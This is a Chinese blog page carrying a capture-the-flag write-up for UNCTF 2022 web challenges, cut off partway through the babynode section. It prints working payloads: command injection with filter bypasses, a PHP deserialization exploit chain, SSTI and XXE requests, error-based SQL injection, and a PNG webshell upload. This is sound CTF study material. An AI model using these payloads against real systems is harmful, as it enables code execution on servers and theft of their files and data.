<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="qingyuchuxue&#39;s blog">
    <meta name="description" content="公开赛道-晴雨初雪WEB:babyphp-中国人民公安大学数组绕过sha1弱比较，用passthur代替system，tail代替cat，%09代替空格，*绕过flag
POST /index.php/?code=passthru(&#34;tai">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>qingyuchuxue&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">qingyuchuxue&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">qingyuchuxue&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/0.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title"></h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-11-21
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-11-21
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.2k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    14 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="公开赛道-晴雨初雪"><a href="#公开赛道-晴雨初雪" class="headerlink" title="公开赛道-晴雨初雪"></a>公开赛道-晴雨初雪</h1><h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB:"></a>WEB:</h1><h2 id="babyphp-中国人民公安大学"><a href="#babyphp-中国人民公安大学" class="headerlink" title="babyphp-中国人民公安大学"></a>babyphp-中国人民公安大学</h2><p>数组绕过sha1弱比较，用passthur代替system，tail代替cat，%09代替空格，*绕过flag</p>
<pre class=" language-http"><code class="language-http">POST /index.php/?code=passthru("tail%09/fla*"); HTTP/1.1
<span class="token header-name keyword">Host:</span> 5a69fdf7-ea39-42fe-ae29-219fa319e7f8.node.yuzhian.com.cn
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1
<span class="token header-name keyword">Content-Type:</span> application/x-www-form-urlencoded
<span class="token header-name keyword">Content-Length:</span> 24

a=0abc&amp;key1[]=1&amp;key2[]=2
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps1.jpg"> </p>
<h2 id="ezgame-浙江师范大学"><a href="#ezgame-浙江师范大学" class="headerlink" title="ezgame-浙江师范大学"></a>ezgame-浙江师范大学</h2><p>打死boss得到flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps2.jpg"> </p>
<h2 id="我太喜欢bilibili大学啦–中北大学"><a href="#我太喜欢bilibili大学啦–中北大学" class="headerlink" title="我太喜欢bilibili大学啦–中北大学"></a>我太喜欢bilibili大学啦–中北大学</h2><p>直接搜索unctf</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps3.jpg"> </p>
<h2 id="ez2048-中南大学"><a href="#ez2048-中南大学" class="headerlink" title="ez2048-中南大学"></a>ez2048-中南大学</h2><p>没有删除环境变量，直接phpinfo.php搜索unctf</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps4.jpg"> </p>
<h2 id="ezunseri-西华大学"><a href="#ezunseri-西华大学" class="headerlink" title="ezunseri-西华大学"></a>ezunseri-西华大学</h2><p>pop链： _destruct()-&gt; _get()-&gt; _toString()-&gt; _invoke()-&gt; excute()</p>
<pre class=" language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">class</span> <span class="token class-name">Exec</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$content</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">execute</span><span class="token punctuation">(</span><span class="token variable">$var</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token function">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__get</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token punctuation">;</span>
       
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__invoke</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">execute</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span> <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
         <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">"1!5!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>


<span class="token keyword">class</span> <span class="token class-name">Test</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$key</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">test</span> <span class="token operator">=</span> <span class="token string">"test123"</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
        <span class="token variable">$name</span> <span class="token operator">=</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">test</span><span class="token punctuation">;</span>
        <span class="token variable">$name</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token operator">&amp;</span><span class="token shell-comment comment">#125; </span>

<span class="token keyword">class</span> <span class="token class-name">Login</span>
<span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    <span class="token keyword">private</span> <span class="token variable">$name</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$code</span> <span class="token operator">=</span> <span class="token string">" JUST FOR FUN"</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$key</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token operator">=</span><span class="token string">"UNCTF"</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>

        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">name</span> <span class="token operator">=</span> <span class="token variable">$name</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">show</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    
        <span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">name</span><span class="token punctuation">.</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span><span class="token punctuation">;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
    
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span> <span class="token operator">=</span> <span class="token string">'3.1415926'</span><span class="token punctuation">)</span><span class="token operator">&amp;</span><span class="token shell-comment comment">#123;</span>
            <span class="token keyword">return</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">name</span><span class="token punctuation">;</span>
        <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>
    <span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token operator">&amp;</span><span class="token shell-comment comment">#125;</span>

<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Login</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">code</span><span class="token operator">=</span><span class="token string">"3.1415926"</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">Exec</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">Test</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">test</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token class-name">Exec</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">key</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">test</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">content</span><span class="token operator">=</span><span class="token string">"system('tac /fla*');"</span><span class="token punctuation">;</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre>
<p>然后把Exec类的变量数+3绕过wakeup</p>
<p> <img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221115195745979.png"></p>
<h2 id="302与深大-深圳大学"><a href="#302与深大-深圳大学" class="headerlink" title="302与深大-深圳大学"></a>302与深大-深圳大学</h2><p>因为题目链接会重定向，所以直接抓打开题目的包，然后根据题目要求修改请求包</p>
<pre class=" language-http"><code class="language-http">POST /?miku=puppy HTTP/1.1
<span class="token header-name keyword">Host:</span> 01db829f-f626-4054-a820-0cbef08717fc.node.yuzhian.com.cn
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1
<span class="token header-name keyword">Cookie:</span> admin=true
<span class="token header-name keyword">Content-Type:</span> application/x-www-form-urlencoded
<span class="token header-name keyword">Content-Length:</span> 10

micgo=ikun
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps5.jpg"> </p>
<h2 id="easy-upload-云南警官学院"><a href="#easy-upload-云南警官学院" class="headerlink" title="easy_upload-云南警官学院"></a>easy_upload-云南警官学院</h2><p>通过多次上传，发现只能上传png文件，直接上传png一句话木马</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps6.jpg"> </p>
<p> 在文件存储位置命令执行</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps7.jpg"> </p>
<p> 发现flag在&#x2F;home&#x2F;ctf&#x2F;flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps8.jpg"> </p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps9.jpg"> </p>
<h2 id="easy-ssti-金陵科技学院"><a href="#easy-ssti-金陵科技学院" class="headerlink" title="easy ssti-金陵科技学院"></a>easy ssti-金陵科技学院</h2><p>ctfshow ssti随便搜一个exp，发现找到假的flag</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps10.jpg"> </p>
<p>于是尝试动态变量</p>
<pre class=" language-http"><code class="language-http">POST /register HTTP/1.1
<span class="token header-name keyword">Host:</span> 2a869ed1-77d6-4992-b8b8-e8733bb3a048.node.yuzhian.com.cn
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Content-Type:</span> application/x-www-form-urlencoded
<span class="token header-name keyword">Content-Length:</span> 101
<span class="token header-name keyword">Origin:</span> http://2a869ed1-77d6-4992-b8b8-e8733bb3a048.node.yuzhian.com.cn
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Referer:</span> http://2a869ed1-77d6-4992-b8b8-e8733bb3a048.node.yuzhian.com.cn/
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1

user==&amp;#123;&amp;#123;x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("env").read()')&amp;#125;&amp;#125;&amp;pwd=111
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps11.jpg"> </p>
<h2 id="听说php有一个xxe-西南科技大学"><a href="#听说php有一个xxe-西南科技大学" class="headerlink" title="听说php有一个xxe-西南科技大学"></a>听说php有一个xxe-西南科技大学</h2><p> ctfshow xxe随便搜一个exp</p>
<pre class=" language-http"><code class="language-http">GET /dom.php HTTP/1.1
<span class="token header-name keyword">Host:</span> 40e45f57-931f-4376-a7c2-146428824b2c.node.yuzhian.com.cn
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
<span class="token header-name keyword">Accept:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
<span class="token header-name keyword">Accept-Language:</span> zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
<span class="token header-name keyword">Accept-Encoding:</span> gzip, deflate
<span class="token header-name keyword">Connection:</span> close
<span class="token header-name keyword">Upgrade-Insecure-Requests:</span> 1
<span class="token header-name keyword">Content-Length:</span> 126

&lt;?xml version="1.0"?>
&lt;!DOCTYPE xml [
&lt;!ENTITY xxe SYSTEM "file:///flag">
]>
&lt;paidx0>
&lt;ctfshow>&amp;xxe;&lt;/ctfshow>
&lt;/paidx0>
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps12.jpg"> </p>
<h2 id="随便注-云南警官学院"><a href="#随便注-云南警官学院" class="headerlink" title="随便注-云南警官学院"></a>随便注-云南警官学院</h2><p>经过尝试发现过滤了关键字，并且是报错注入，于是大写关键字绕过过滤</p>
<p>查询数据库名</p>
<p>id&#x3D;1’ AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))–+</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps13.jpg"> </p>
<p>查询表名</p>
<p>id&#x3D;1’ AND extractvalue(1,concat(0x7e,(SELECT group_concat(table_name) FROM infORmation_schema.tables WHERE table_schema&#x3D;’admin’),0x7e))–+</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps14.jpg"> </p>
<p>查询字段名</p>
<p>id&#x3D;1’ AND extractvalue(1,concat(0x7e,(SELECT group_concat(column_name) FROM infORmation_schema.columns WHERE table_name&#x3D;’haha’),0x7e))–+</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps15.jpg"> </p>
<p>然后无论怎么查询字段值都找不到flag，然后想到了load_file函数，于是搜了一个exp，稍微改一下</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps16.jpg"> </p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps17.jpg"> </p>
<p>因为flag没有完全显现，所以再次截取后半截</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/wps18.jpg"> </p>
<h2 id="babynode-云南大学"><a href="#babynode-云南大学" class="headerlink" title="babynode-云南大学"></a>babynode-云南大学</h2><pre class=" language-http"><code class="language-http">POST / HTTP/1.1
<span class="token header-name keyword">Host:</span> 0046b0e6-ea49-4b38-8937-768ca72ddbc9.node.yuzhian.com.cn
<span class="token header-name keyword">User-Agent:</span> Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
